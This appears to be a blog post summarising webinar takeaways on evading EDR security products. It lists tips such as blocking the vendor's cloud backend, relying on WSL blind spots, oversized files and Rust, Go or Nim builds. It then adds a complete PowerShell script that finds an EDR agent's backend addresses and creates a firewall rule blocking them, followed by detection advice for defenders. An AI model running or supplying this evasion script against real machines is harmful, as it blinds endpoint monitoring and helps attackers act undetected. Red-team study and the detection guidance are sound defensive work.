February 11

Webinar Takeaway: Black Hills Infosec: Sacred Cash Cow Tipping 2021


My key takeaways

  • EDR loader: may execute shellcode
  • Most EDRs are cloud-managed
    • Recipe to pwn such an EDR:
      • get the IPs of the vendor's cloud backend (usually whitelisted)
      • create a Windows firewall rule that blocks outbound traffic to these IPs
      • EDR pwned
  • EDRs have been blind to WSL(2) since 2018
  • Files larger than 50 MB are usually ignored by EDRs
  • Rust, Go and Nim are used to bypass EDR
  • A lot of malware is still written in Delphi
  • EDRs look for comments in code
    • no comments, no cry
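The "block the vendor's cloud" recipe, spelled out as an added example. This is my own illustration, not code from the webinar or from Black Hills Infosec. It assumes local administrator rights, an agent process called edr_agent (a made-up name; substitute the real service process) and uses TEST-NET placeholder ranges where a real vendor's addresses would go:

```powershell
# Added example: cut a cloud-managed EDR agent off from its backend with the
# Windows host firewall. Needs local admin. All addresses are placeholders.
#Requires -RunAsAdministrator

# Step 1: learn which remote addresses the agent is actually talking to.
# 'edr_agent' is an assumed process name, not a real product's.
$agentName = 'edr_agent'
$agentPids = (Get-Process -Name $agentName -ErrorAction SilentlyContinue).Id
$observed  = @()
if ($agentPids) {
    $observed = Get-NetTCPConnection -State Established |
        Where-Object { $agentPids -contains $_.OwningProcess } |
        Select-Object -ExpandProperty RemoteAddress -Unique
}

# Step 2: merge with the vendor ranges known from documentation or DNS.
# TEST-NET ranges stand in for the real backend here.
$vendorRanges = @('192.0.2.0/24', '198.51.100.0/24', '203.0.113.0/24')
$blockList = @($observed + $vendorRanges |
    Where-Object { $_ -notmatch '^(127\.|::1$|0\.0\.0\.0$)' } |
    Sort-Object -Unique)

# Step 3: a single outbound block rule covering every firewall profile.
# Block rules win over allow rules, so the vendor's whitelist entry does not help.
$ruleName = 'Block EDR cloud backend'
New-NetFirewallRule -DisplayName $ruleName `
    -Description 'Outbound block to EDR backend addresses (test engagement)' `
    -Direction Outbound -Action Block -Profile Any `
    -RemoteAddress $blockList -Enabled True | Out-Null

# Step 4: verify the rule and its address filter were applied as intended.
Get-NetFirewallRule -DisplayName $ruleName |
    Get-NetFirewallAddressFilter |
    Select-Object -ExpandProperty RemoteAddress

# Cleanup after the engagement:
# Remove-NetFirewallRule -DisplayName 'Block EDR cloud backend'
```

Two caveats a practitioner will want. First, this only works while the agent relies on the host's own firewall and does not protect or re-create its rules; treat that as something to test per product, not as a given. Second, on the blue side the rule creation is not silent: the Microsoft-Windows-Windows Firewall With Advanced Security/Firewall log records a new rule as Event ID 2004, and with the "Audit MPSSVC Rule-Level Policy Change" subcategory enabled the Security log records it as Event ID 4946, so a hunt for firewall rules whose remote addresses overlap the EDR vendor's ranges is a cheap detection.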

Tags

EDR, webinar takeaway

